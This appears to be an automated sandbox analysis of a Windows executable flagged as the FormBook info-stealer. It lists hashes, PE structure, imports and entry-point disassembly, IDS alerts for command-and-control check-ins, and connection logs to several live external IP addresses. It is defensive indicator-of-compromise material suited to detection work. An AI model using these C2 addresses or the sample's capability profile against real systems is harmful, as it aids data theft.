                                                                            SHA1:08eddcdbf872273fffd90569024c74d99da2c6bd
                                                                            SHA256:494b4e888e21a6d9545fb434442900723eae53eb99882dfaa5f30367bf37d4c5
                                                                            SHA512:e0db21bd4c0d66de73d5c50e7c37f4dac3b621e683fcfb43e7a7f52b8257ff809933c225372a35b12d9d874c23fd57c3647d484888fcebd7160107217f24f7d1
                                                                            SSDEEP:12288:rLkcoxg7v3qnC11ErwIhh0F4qwUgUny5QLsnS59FyVmjO1A8uHKK1wkY6AQ:ffmMv6Ckr7Mny5QLsmWmjCZtKN7F
                                                                            TLSH:2225D112B7D680B6DDA339B1293BE32BEB3575194327C48B97E02E778F111409B3A761
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                            Icon Hash:1733312925935517
                                                                            Entrypoint:0x416310
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:0
                                                                            File Version Major:5
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                            Instruction
                                                                            call 00007F262CEDCB2Ch
                                                                            jmp 00007F262CED08FEh
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push edi
                                                                            push esi
                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                            mov ecx, dword ptr [ebp+10h]
                                                                            mov edi, dword ptr [ebp+08h]
                                                                            mov eax, ecx
                                                                            mov edx, ecx
                                                                            add eax, esi
                                                                            cmp edi, esi
                                                                            jbe 00007F262CED0A8Ah
                                                                            cmp edi, eax
                                                                            jc 00007F262CED0C2Ah
                                                                            cmp ecx, 00000100h
                                                                            jc 00007F262CED0AA1h
                                                                            cmp dword ptr [004A94E0h], 00000000h
                                                                            je 00007F262CED0A98h
                                                                            push edi
                                                                            push esi
                                                                            and edi, 0Fh
                                                                            and esi, 0Fh
                                                                            cmp edi, esi
                                                                            pop esi
                                                                            pop edi
                                                                            jne 00007F262CED0A8Ah
                                                                            pop esi
                                                                            pop edi
                                                                            pop ebp
                                                                            jmp 00007F262CED0EEAh
                                                                            test edi, 00000003h
                                                                            jne 00007F262CED0A97h
                                                                            shr ecx, 02h
                                                                            and edx, 03h
                                                                            cmp ecx, 08h
                                                                            jc 00007F262CED0AACh
                                                                            rep movsd
                                                                            jmp dword ptr [00416494h+edx*4]
                                                                            nop
                                                                            mov eax, edi
                                                                            mov edx, 00000003h
                                                                            sub ecx, 04h
                                                                            jc 00007F262CED0A8Eh
                                                                            and eax, 03h
                                                                            add ecx, eax
                                                                            jmp dword ptr [004163A8h+eax*4]
                                                                            jmp dword ptr [004164A4h+ecx*4]
                                                                            nop
                                                                            jmp dword ptr [00416428h+ecx*4]
                                                                            nop
                                                                            mov eax, E4004163h
                                                                            arpl word ptr [ecx+00h], ax
                                                                            or byte ptr [ecx+eax*2+00h], ah
                                                                            and edx, ecx
                                                                            mov al, byte ptr [esi]
                                                                            mov byte ptr [edi], al
                                                                            mov al, byte ptr [esi+01h]
                                                                            mov byte ptr [edi+01h], al
                                                                            mov al, byte ptr [esi+02h]
                                                                            shr ecx, 02h
                                                                            mov byte ptr [edi+02h], al
                                                                            add esi, 03h
                                                                            add edi, 03h
                                                                            cmp ecx, 08h
                                                                            jc 00007F262CED0A4Eh
                                                                            Programming Language:
                                                                            • [ASM] VS2008 SP1 build 30729
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [C++] VS2008 SP1 build 30729
                                                                            • [ C ] VS2005 build 50727
                                                                            • [IMP] VS2005 build 50727
                                                                            • [ASM] VS2008 build 21022
                                                                            • [RES] VS2008 build 21022
                                                                            • [LNK] VS2008 SP1 build 30729
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                            RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                            RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                            RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                            RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                            RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                            RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                            RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                            RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                            RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                            RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                            RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                            RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                            RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                            RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                            RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                            RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                            RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                            RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                            RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                            RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                            RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                            RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                            RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                            RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                            RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                            RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                            DLLImport
                                                                            WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                            VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                            COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                            MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                            PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                            USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                            KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                            USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                            GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                            ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                            ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                            OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishGreat Britain
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-10T16:23:49.467410+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497573.33.130.19080TCP
                                                                            2024-12-10T16:23:49.467410+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497573.33.130.19080TCP
                                                                            2024-12-10T16:24:01.517330+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549796180.178.39.23680TCP
                                                                            2024-12-10T16:24:04.236517+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549802180.178.39.23680TCP
                                                                            2024-12-10T16:24:06.935287+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549808180.178.39.23680TCP
                                                                            2024-12-10T16:24:09.611947+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549816180.178.39.23680TCP
                                                                            2024-12-10T16:24:09.611947+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549816180.178.39.23680TCP
                                                                            2024-12-10T16:24:16.446620+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549833203.161.49.19380TCP
                                                                            2024-12-10T16:24:19.126391+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549839203.161.49.19380TCP
                                                                            2024-12-10T16:24:21.845643+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549845203.161.49.19380TCP
                                                                            2024-12-10T16:24:24.436750+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549854203.161.49.19380TCP
                                                                            2024-12-10T16:24:24.436750+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549854203.161.49.19380TCP
                                                                            2024-12-10T16:24:31.925227+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549872217.160.0.13280TCP
                                                                            2024-12-10T16:24:34.584290+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549878217.160.0.13280TCP
                                                                            2024-12-10T16:24:37.361408+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549884217.160.0.13280TCP
                                                                            2024-12-10T16:24:39.938824+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549894217.160.0.13280TCP
                                                                            2024-12-10T16:24:39.938824+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549894217.160.0.13280TCP
                                                                            2024-12-10T16:24:47.192472+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549911216.40.34.4180TCP
                                                                            2024-12-10T16:24:49.853751+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549917216.40.34.4180TCP
                                                                            2024-12-10T16:24:52.581039+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549923216.40.34.4180TCP
                                                                            2024-12-10T16:24:55.167018+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549934216.40.34.4180TCP
                                                                            2024-12-10T16:24:55.167018+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549934216.40.34.4180TCP
                                                                            2024-12-10T16:25:02.442109+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499453.33.130.19080TCP
                                                                            2024-12-10T16:25:04.697169+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499553.33.130.19080TCP
                                                                            2024-12-10T16:25:07.348123+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499613.33.130.19080TCP
                                                                            2024-12-10T16:25:19.189090+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5499683.33.130.19080TCP
                                                                            2024-12-10T16:25:19.189090+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5499683.33.130.19080TCP
                                                                            2024-12-10T16:25:26.302171+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999546.38.243.23480TCP
                                                                            2024-12-10T16:25:28.958390+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999646.38.243.23480TCP
                                                                            2024-12-10T16:25:31.613836+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999746.38.243.23480TCP
                                                                            2024-12-10T16:25:40.784275+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999846.38.243.23480TCP
                                                                            2024-12-10T16:25:40.784275+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54999846.38.243.23480TCP
                                                                            2024-12-10T16:25:48.568365+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999974.48.34.4380TCP
                                                                            2024-12-10T16:25:51.223207+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000074.48.34.4380TCP
                                                                            2024-12-10T16:25:53.879832+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000174.48.34.4380TCP
                                                                            2024-12-10T16:25:56.550295+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55000274.48.34.4380TCP
                                                                            2024-12-10T16:25:56.550295+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55000274.48.34.4380TCP
                                                                            2024-12-10T16:26:04.340359+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000323.167.152.4180TCP
                                                                            2024-12-10T16:26:06.996278+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000423.167.152.4180TCP
                                                                            2024-12-10T16:26:09.658023+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000523.167.152.4180TCP
                                                                            2024-12-10T16:26:12.510591+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55000623.167.152.4180TCP
                                                                            2024-12-10T16:26:12.510591+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55000623.167.152.4180TCP
                                                                            2024-12-10T16:26:19.926376+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550007178.79.184.19680TCP
                                                                            2024-12-10T16:26:22.600329+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550008178.79.184.19680TCP
                                                                            2024-12-10T16:26:25.254544+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550009178.79.184.19680TCP
                                                                            2024-12-10T16:26:32.876349+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550010178.79.184.19680TCP
                                                                            2024-12-10T16:26:32.876349+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550010178.79.184.19680TCP
                                                                            2024-12-10T16:26:40.406312+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001145.79.252.9480TCP
                                                                            2024-12-10T16:26:43.018497+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001245.79.252.9480TCP
                                                                            2024-12-10T16:26:45.676025+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001345.79.252.9480TCP
                                                                            2024-12-10T16:26:48.335378+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55001445.79.252.9480TCP
                                                                            2024-12-10T16:26:48.335378+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55001445.79.252.9480TCP
                                                                            2024-12-10T16:27:03.926117+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001531.31.198.14580TCP
                                                                            2024-12-10T16:27:07.551628+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001631.31.198.14580TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 10, 2024 16:23:43.239670992 CET4975780192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:23:43.359101057 CET80497573.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:23:43.359191895 CET4975780192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:23:43.367466927 CET4975780192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:23:43.486758947 CET80497573.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:23:49.466730118 CET80497573.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:23:49.467267036 CET80497573.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:23:49.467410088 CET4975780192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:23:49.513734102 CET4975780192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:23:49.633032084 CET80497573.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:23:59.875107050 CET4979680192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:23:59.995091915 CET8049796180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:23:59.998097897 CET4979680192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:00.074867010 CET4979680192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:00.194633961 CET8049796180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:01.517070055 CET8049796180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:01.517251015 CET8049796180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:01.517329931 CET4979680192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:01.582484961 CET4979680192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:02.601067066 CET4980280192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:02.720427036 CET8049802180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:02.720557928 CET4980280192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:02.772902012 CET4980280192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:02.893203974 CET8049802180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:04.236289024 CET8049802180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:04.236464024 CET8049802180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:04.236516953 CET4980280192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:04.285783052 CET4980280192.168.2.5180.178.39.236
